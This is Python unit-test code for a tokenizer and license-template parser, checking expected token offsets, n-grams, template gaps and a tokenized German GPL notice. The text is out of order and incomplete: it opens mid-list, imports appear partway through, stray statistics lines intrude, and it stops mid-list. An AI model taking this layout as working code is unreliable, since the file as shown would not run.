Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=23, end_line=2, end_char=35, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_can_handle_contiguous_template_regions(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}
{{6 }}of its contributors may materials provided with the
distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=4))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=1, start_char=25, end_line=1, end_char=27, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=28, end_line=1, end_char=31, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=28, end_line=1, end_char=31, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with'),
Token(start=0, start_line=1, start_char=73, end_line=1, end_char=76, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with'),
Token(start=0, start_line=1, start_char=73, end_line=1, end_char=76, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=31, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_ngram_tokenizer_can_handle_gaps_at_end_of_text(self):
lines = [u'Neither the name of {{10 the ORGANIZATION}} ']
ngram_len = 2
result = list(ngram_tokenizer(lines, ngram_len, template=True))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'neither', u'the')),
Token(start=1, start_line=0, start_char=8, end_line=0, end_char=16, end=2, gap=0, value=(u'the', u'name')),
Token(start=2, start_line=0, start_char=12, end_line=0, end_char=19, end=3, gap=10, value=(u'name', u'of'))
]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_n3(self):
lines = [u'X11 License']
ngram_len = 3
result = list(ngram_tokenizer(lines, ngram_len))
assert lines == list(doc_subset(lines, result[0]))
expected = [Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'x11', u'license'))]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_n1(self):
lines = [u'X11 License']
ngram_len = 1
result = list(ngram_tokenizer(lines, ngram_len))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=3, end=0, gap=0, value=(u'x11',)),
Token(start=1, start_line=0, start_char=4, end_line=0, end_char=11, end=1, gap=0, value=(u'license',)),
]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_template(self):
lines = [u'X11 License']
ngram_len = 3
result = list(ngram_tokenizer(lines, ngram_len, template=True))
assert lines == list(doc_subset(lines, result[0]))
expected = [Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'x11', u'license'))]
assert expected == result
def test_unicode_text_lines_handles_weird_xml_encodings(self):
test_file = self.get_test_loc('analysis/weird_encoding/easyconf-0.9.0.pom')
result = list(unicode_text_lines(test_file))
expected_file = self.get_test_loc('analysis/weird_encoding/easyconf-0.9.0.pom.expected')
with open(expected_file, 'rb') as tf:
expected = cPickle.load(tf)
assert expected == result
class TestMultigrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
# TODO: add more tests beyond the simple doctests that exist in the code
@skipIf(True, 'Performance tests only')
class TestAnalysisPerformance(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_splitter_perf(self):
test_file = self.get_test_loc('perf/test.txt')
text = open(test_file).read() * 100
utext = unicode(text)
setup1 = '''
import re
from textcode import analysis
unicode_ws = analysis.word_splitter
plain_ws =re.compile(r'[^\W_]+').finditer
unicode_ts = analysis.template_splitter
plain_ts= re.compile(r'(?:[^\W_])+|(?:\{\{)|(?:\}\})').finditer
text = %r
utext = %r''' % (text, utext)
def check_perf(setup):
from timeit import timeit
stmt = 'list(w for w in %s(%s))'
print()
print('Unicode template')
print(timeit(stmt % ('unicode_ts', 'utext'), setup=setup, number=1000))
print('Plain template')
print(timeit(stmt % ('plain_ts', 'text'), setup=setup, number=1000))
print('Unicode words')
print(timeit(stmt % ('unicode_ws', 'utext'), setup=setup, number=1000))
print('Plain words')
print(timeit(stmt % ('plain_ws', 'text'), setup=setup, number=1000))
print('Plain split')
print(timeit('text.split()', setup=setup, number=1000))
print('Unicode split')
print(timeit('utext.split()', setup=setup, number=1000))
print('Line split')
print(timeit('text.splitlines(False)', setup=setup, number=1000))
print('Line split with ends')
print(timeit('text.splitlines(True)', setup=setup, number=1000))
check_perf(setup=setup1)
setup2 = '''
import re
from textcode import analysis
unicode_ws = analysis.word_splitter
plain_ws =re.compile(r'[^\W_]+').finditer
unicode_ts = analysis.template_splitter
plain_ts= re.compile(r'(?:[^\W_])+|(?:\{\{)|(?:\}\})').finditer
text = %r
utext = %r''' % (text, utext)
check_perf(setup=setup2)
| 63.972603
| 143
| 0.649402
|
from __future__ import absolute_import, print_function
import json
import os
import codecs
import cPickle
from unittest.case import skipIf
from commoncode.testcase import FileBasedTesting
from textcode.analysis import DEFAULT_GAP
from textcode.analysis import NO_GAP
from textcode.analysis import InvalidGapError
from textcode.analysis import UnbalancedTemplateError
from textcode.analysis import Token
from textcode.analysis import word_splitter
from textcode.analysis import unigram_splitter
from textcode.analysis import unigram_tokenizer
from textcode.analysis import position_processor
from textcode.analysis import template_splitter
from textcode.analysis import template_processor
from textcode.analysis import ngram_to_token
from textcode.analysis import ngram_tokenizer
from textcode.analysis import tokens_ngram_processor
from textcode.analysis import doc_subset
from textcode.analysis import unicode_text_lines
from textcode.analysis import text_lines
)
result = [t.value for t in tst]
assert expected == result
class TestTemplates(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def template_parsing(self, lines):
if isinstance(lines, basestring):
lines = lines.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
return list(template_processor(unigrams))
def test_process_template_handles_empty_templates_using_default_gap(self):
lines = [u'ab{{}}cd']
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=6, end_char=8, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_gap(self):
lines = u'ab{{10 nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=21, end_char=23, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_raise_invalid_gap_exception(self):
lines = u'ab{{151 nexb Company}}cd'
self.assertRaises(InvalidGapError, self.template_parsing, lines)
def test_process_template_recognizes_template_with_maxgap(self):
lines = u'ab{{150 nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=150),
Token(start_line=0, end_line=0, start_char=22, end_char=24, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_only_gap(self):
lines = u'ab{{10}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=8, end_char=10, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_only_gap_and_spaces(self):
lines = u'ab{{ 10 }}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=16, end_char=18, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_set_default_gap_if_none_is_specified(self):
lines = u'ab{{nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_set_default_gap_if_none_is_specified_ignoring_spaces(self):
lines = u'ab{{ \sdsdnexb Companysd }}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=28, end_char=30, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_can_process_multiple_templatized_regions_with_default_gap(self):
lines = u'ab{{nexb Company}}cd {{second}}ef'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=31, end_char=33, value=u'ef', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_can_process_multiple_templatized_regions_with_default_gap_and_custom_gaps(self):
lines = u'ab{{nexb Company}}cd{{12 second}}ef{{12 second}}gh'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=12),
Token(start_line=0, end_line=0, start_char=33, end_char=35, value=u'ef', gap=12),
Token(start_line=0, end_line=0, start_char=48, end_char=50, value=u'gh', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_handles_combination_of_well_formed_and_ill_formed_templates(self):
lines = u'ab{{c}}d}}ef'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=7, end_char=8, value=u'd', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=10, end_char=12, value=u'ef', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_handles_empty_lines(self):
lines = u'\n\n'
expected = []
assert expected == self.template_parsing(lines)
def test_process_template_handles_None(self):
lines = None
expected = []
assert expected == self.template_parsing(lines)
def test_process_template_can_parse_simple_line(self):
lines = u'Licensed by {{12 nexB}} to you '
expected = u'licensed by to you'
result = u' '.join(x.value for x in self.template_parsing(lines))
assert expected == result
def test_process_template_does_not_throw_exception_for_illegal_pystache_templates(self):
lines = u'''Permission to use, copy, modify, and {{ /or : the
lines exist without or }} distribute this software...'''
self.template_parsing(lines)
def test_process_template_handles_unicode_text_correctly(self):
expected = [
Token(start_line=0, end_line=0, start_char=1, end_char=4, value=u'ist', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=5, end_char=10, value=u'freie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=11, end_char=19, value=u'software', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=21, end_char=24, value=u'sie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=25, end_char=31, value=u'k\xf6nnen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=32, end_char=34, value=u'es', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=35, end_char=40, value=u'unter', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=41, end_char=44, value=u'den', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=45, end_char=56, value=u'bedingungen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=57, end_char=60, value=u'der', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=61, end_char=64, value=u'gnu', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=1, end_char=8, value=u'general', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=17, end_char=20, value=u'wie', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=21, end_char=24, value=u'von', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=25, end_char=28, value=u'der', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=29, end_char=33, value=u'free', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=34, end_char=42, value=u'software', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=43, end_char=53, value=u'foundation', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=54, end_char=68, value=u'ver\xf6ffentlicht', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=1, end_char=12, value=u'weitergeben', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=13, end_char=16, value=u'und', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=17, end_char=21, value=u'oder', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=23, end_char=24, value=u'n', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=1, end_char=13, value=u'modifizieren', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=15, end_char=23, value=u'entweder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=24, end_char=29, value=u'gem\xe4\xdf', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=30, end_char=37, value=u'version', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=38, end_char=39, value=u'3', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=40, end_char=43, value=u'der', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=44, end_char=50, value=u'lizenz', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=51, end_char=55, value=u'oder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=57, end_char=61, value=u'nach', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=62, end_char=67, value=u'ihrer', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=68, end_char=74, value=u'option', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=1, end_char=6, value=u'jeder', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=7, end_char=15, value=u'sp\xe4teren', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=1, end_char=8, value=u'version', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=7, end_line=7, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=1, end_char=4, value=u'die', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=5, end_char=21, value=u'ver\xf6ffentlichung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=22, end_char=25, value=u'von', gap=DEFAULT_GAP),
Token(start_line=8, end_line=8, start_char=38, end_char=45, value=u'erfolgt', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=46, end_char=48, value=u'in', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=49, end_char=52, value=u'der', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=53, end_char=61, value=u'hoffnung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=63, end_char=66, value=u'da\xdf', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=67, end_char=69, value=u'es', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=70, end_char=75, value=u'ihnen', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=76, end_char=79, value=u'von', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=1, end_char=7, value=u'nutzen', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=9, end_char=10, value=u'n', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=1, end_char=5, value=u'sein', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=6, end_char=10, value=u'wird', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=12, end_char=16, value=u'aber', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=17, end_char=21, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=22, end_char=32, value=u'irgendeine', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=33, end_char=41, value=u'garantie', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=43, end_char=48, value=u'sogar', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=49, end_char=53, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=54, end_char=57, value=u'die', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=58, end_char=67, value=u'implizite', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=68, end_char=76, value=u'garantie', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=5, end_char=15, value=u'marktreife', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=1, end_char=5, value=u'oder', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=6, end_char=9, value=u'der', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=10, end_char=24, value=u'verwendbarkeit', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=25, end_char=28, value=u'f\xfcr', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=29, end_char=34, value=u'einen', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=35, end_char=45, value=u'bestimmten', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=46, end_char=51, value=u'zweck', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=53, end_char=60, value=u'details', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=61, end_char=67, value=u'finden', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=68, end_char=71, value=u'sie', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=72, end_char=74, value=u'in', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=5, end_char=8, value=u'gnu', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=9, end_char=16, value=u'general', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=18, end_char=19, value=u'n', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=15, end_line=15, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=1, end_char=4, value=u'sie', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=5, end_char=12, value=u'sollten', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=13, end_char=16, value=u'ein', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=17, end_char=25, value=u'exemplar', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=26, end_char=29, value=u'der', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=30, end_char=33, value=u'gnu', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=34, end_char=41, value=u'general', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=42, end_char=48, value=u'public', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=49, end_char=56, value=u'license', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=57, end_char=65, value=u'zusammen', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=66, end_char=69, value=u'mit', gap=DEFAULT_GAP),
Token(start_line=17, end_line=17, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=1, end_char=9, value=u'erhalten', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=10, end_char=15, value=u'haben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=17, end_char=22, value=u'falls', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=23, end_char=28, value=u'nicht', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=30, end_char=39, value=u'schreiben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=40, end_char=43, value=u'sie', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=44, end_char=46, value=u'an', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=47, end_char=50, value=u'die', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=51, end_char=55, value=u'free', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=56, end_char=64, value=u'software', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=65, end_char=75, value=u'foundation', gap=NO_GAP),
Token(start_line=19, end_line=19, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=1, end_char=4, value=u'inc', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=7, end_char=9, value=u'51', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=10, end_char=18, value=u'franklin', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=19, end_char=21, value=u'st', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=23, end_char=28, value=u'fifth', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=29, end_char=34, value=u'floor', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=36, end_char=42, value=u'boston', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=44, end_char=46, value=u'ma', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=47, end_char=52, value=u'02110', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=54, end_char=57, value=u'usa', gap=NO_GAP),
]
test_file = self.get_test_loc('analysis/unicode/12180.atxt')
with codecs.open(test_file, encoding='utf-8') as test:
lines = test.read().splitlines()
result = list(self.template_parsing(lines))
assert expected == result
def test_process_template_can_handle_long_text(self):
expected = [
Token(start_line=0, end_line=0, start_char=14, end_char=17, value=u'ist', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=23, value=u'freie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=24, end_char=32, value=u'software', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=34, end_char=37, value=u'sie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=38, end_char=44, value=u'k\xf6nnen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=45, end_char=47, value=u'es', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=48, end_char=53, value=u'unter', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=54, end_char=57, value=u'den', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=58, end_char=69, value=u'bedingungen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=70, end_char=73, value=u'der', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=74, end_char=77, value=u'gnu', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=1, end_char=8, value=u'general', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=17, end_char=20, value=u'wie', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=21, end_char=24, value=u'von', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=25, end_char=28, value=u'der', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=29, end_char=33, value=u'free', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=34, end_char=42, value=u'software', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=43, end_char=53, value=u'foundation', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=54, end_char=68, value=u'ver\xf6ffentlicht', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=1, end_char=12, value=u'weitergeben', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=13, end_char=16, value=u'und', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=17, end_char=21, value=u'oder', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=23, end_char=24, value=u'n', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=1, end_char=13, value=u'modifizieren', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=15, end_char=23, value=u'entweder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=24, end_char=29, value=u'gem\xe4\xdf', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=30, end_char=37, value=u'version', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=38, end_char=39, value=u'3', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=40, end_char=43, value=u'der', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=44, end_char=50, value=u'lizenz', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=51, end_char=55, value=u'oder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=57, end_char=61, value=u'nach', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=62, end_char=67, value=u'ihrer', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=68, end_char=74, value=u'option', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=1, end_char=6, value=u'jeder', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=7, end_char=15, value=u'sp\xe4teren', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=1, end_char=8, value=u'version', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=7, end_line=7, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=1, end_char=4, value=u'die', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=5, end_char=21, value=u'ver\xf6ffentlichung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=22, end_char=25, value=u'von', gap=DEFAULT_GAP),
Token(start_line=8, end_line=8, start_char=38, end_char=45, value=u'erfolgt', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=46, end_char=48, value=u'in', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=49, end_char=52, value=u'der', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=53, end_char=61, value=u'hoffnung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=63, end_char=66, value=u'da\xdf', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=67, end_char=69, value=u'es', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=70, end_char=75, value=u'ihnen', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=76, end_char=79, value=u'von', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=1, end_char=7, value=u'nutzen', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=9, end_char=10, value=u'n', gap=NO_GAP),
